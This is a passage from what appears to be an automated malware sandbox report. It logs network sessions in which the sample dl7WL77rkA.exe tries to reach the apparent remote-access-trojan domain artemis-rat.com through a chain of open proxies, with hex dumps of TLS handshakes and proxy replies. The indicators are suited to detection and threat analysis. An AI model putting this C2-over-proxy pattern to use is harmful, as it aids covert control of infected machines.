                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            163192.168.2.5502934.144.161.159803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.320682049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.420471907 CET59INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: nginx
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.420902967 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee 6c ce d6 96 24 78 78 1e 89 d5 a0 06 ea 41 38 f9 46 7c 18 98 49 27 f2 3d 4b 14 62 ff f1 74 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: el$xxA8F|I'=Kbt*,+0/$#('=<5/Uartemis-rat.com#
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.807411909 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ee 6c cf 73 23 4a 55 da 1d ee d7 10 52 52 7a 70 60 e1 48 33 5a 7c b7 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                                                                                                                                                                                            Data Ascii: C?els#JURRzp`H3Z|DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.807523966 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                                                                                                                                                                                            Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.807542086 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                                                                                                                                                                                                                                            Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.807574987 CET736INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                                                                                                                                                                                                                                            Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.009232998 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 b6 b2 73 a4 8b 96 40 08 c2 50 80 bd 09 7f ee 7b 83 d4 69 a0 9b 54 8c 4b ba ad 91 2a 3c ab 0a 72 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 60 4b e6 22 64 31 c2 05 0b 2b 09 19 fb 08 4e 6f f8 78 33 44 ac
                                                                                                                                                                                                                                                            Data Ascii: %! s@P{iTK*<r(`K"d1+Nox3DD3Od
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.348474979 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 ea 0e 0f 5b c6 70 51 f5 96 8e 45 a4 8d 44 96 1f 73 64 5f c4 0c 20 dc 67 70 5c 10 33 2f a6 9b 37 d1 74 e8 83 82 63 aa b1 c1 04 08 77 b5 c6 61 d8 61 98 0e 49 14 f9 01 b2 86 25 0f 46 bf e5 90 df 12 51 e7
                                                                                                                                                                                                                                                            Data Ascii: [pQEDsd_ gp\3/7tcwaaI%FQ^"NN>O.JLRrG#"deF[70S%Jiaa}zq2Q*kku4dS11s{+K 7'p(9Of}`Qkx7>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.349906921 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 11 9f 5b 06 74 5e b0 b2 5e 2f c2 85 27 5f d4 ba 2e 1e d2 04 44 d7 be 1e 44 99 e0 dc 10 f0 69 5f 62 31 44 62 d6 e3 c3 f0 e4 cd 7f 76 fb 60 56 d5 fc 8d 58 d4 04 14 15 8f bc 46 47 9b 74 0c 8c f1 17 7c ca c6 95
                                                                                                                                                                                                                                                            Data Ascii: [t^^/'_.DDi_b1Dbv`VXFGt|=B4I{L+w7HmO`.}Xu|B7E .<nT}yF|In9+xlIlC`gdSWIlCJRH.RrGT8!" e+
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.695019007 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 b7 31 23 ac 8f 77 02 dc 3f 5d 3b 75 e3 7d bb cc 31 40 4b 95 4a f6 3c 4e 69 da e9 75 d9 ae 8f d2 64 4f b2 31 92 8f 76 23 4b 5a 0a fb f3 6f 24 fa ee 66 ee 79 af 56 de 0d 2b be c4 f8 b1 d9 9d c8 69 8e 89 67 77
                                                                                                                                                                                                                                                            Data Ascii: q1#w?];u}1@KJ<NiudO1v#KZo$fyV+igwn'dU6`7AXp.k;d"Pwk:ii,j sffBj2Vx@$u<~m=^*)PrP,?]FrdD2S_w"btj(/oQbED
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.695080996 CET1286INData Raw: a4 69 0f ea c1 02 e1 66 38 63 3f 85 26 90 ca dc 0f bb a2 88 c3 a1 d1 39 7f e5 a4 b4 3f 96 af dc bb 86 e9 9b 53 db 3c 96 0b d9 1c 6d 2c d0 e4 f5 7f 74 4d 3e ad 3d 11 fc d4 21 8f f1 90 71 91 5d a2 c9 35 26 7c 3e bd cf 23 9d 69 71 c8 b8 4c 30 9b 5a
                                                                                                                                                                                                                                                            Data Ascii: if8c?&9?S<m,tM>=!q]5&|>#iqL0Z>04yhFx$_.tTqk-wR+V$apguQqh$9QmX)*azhT~w4q|"q1VPSjtv+$m


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            164192.168.2.55038023.152.40.1550503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.321508884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:38.172982931 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:38.833858013 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:39.509538889 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:40.821541071 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:43.506450891 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:48.881645918 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:59.381218910 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:21.649727106 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            165192.168.2.55034754.248.238.110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.329782009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.595454931 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.595784903 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee 6c cd 31 7a 89 03 d6 2a 6c fb 06 36 0a e9 7c 04 0c 30 88 c0 82 35 a2 86 77 61 80 b1 7b 92 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: lhel1z*l6|05wa{*,+0/$#('=<5/artemis-rat.com#o Glt0\7.&ZyfEW'6%]+]l1Ga
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.861232042 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 15 0c 98 26 5c 21 9a 1e a2 57 2d d8 05 79 b4 4b 25 72 5b a9 f0 17 0b bf 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                                                                                                                                                                                            Data Ascii: =9&\!W-yK%r[DOWNGRD0000*H010Uartemis-rat.com0240311021335Z260311021335Z010Uartemis-rat.com0"0*H0K
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.866843939 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 7e 43 f6 10 28 84 5d a1 99 88 14 0d b1 cc d2 32 83 2d f3 29 83 e4 76 27 f1 78 0f fb 8b e8 db 2a 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 85 d8 ad 11 c4 04 d0 e6 d7 02 53 21 c1 b8 13 0d c5 51 ed a1 fa
                                                                                                                                                                                                                                                            Data Ascii: %! ~C(]2-)v'x*(S!QLNcz
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.130951881 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 ac 67 88 8a df c9 c3 5e 5d aa f5 e0 fd c4 91 7d 72 ed 6e bf eb af 4f bb 31 a6 f2 e5 a4 10 7d da d9 cd b3 16 0a b6 48 95
                                                                                                                                                                                                                                                            Data Ascii: (g^]}rnO1}H


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            166192.168.2.54976772.195.34.35273603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.332847118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            167192.168.2.550437172.67.187.242803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.332849979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.487535954 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            168192.168.2.550274139.99.197.231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.333419085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.139238119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.357997894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806682110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.327191114 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            169192.168.2.550281128.199.221.91216053876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.335499048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            170192.168.2.550327203.218.172.22580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.348542929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.661139011 CET326INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            171192.168.2.54977250.227.218.17256783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.348545074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            172192.168.2.55039738.162.30.15131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.349592924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.798530102 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            173192.168.2.550298182.52.229.16580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.354543924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.091219902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.702224016 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            174192.168.2.55040392.204.134.38529293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.363325119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.920433044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.623704910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.202022076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092750072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.905401945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.905189991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.592691898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            175192.168.2.54973931.42.184.146577523876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.375863075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            176192.168.2.550364153.127.194.62803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.379909039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
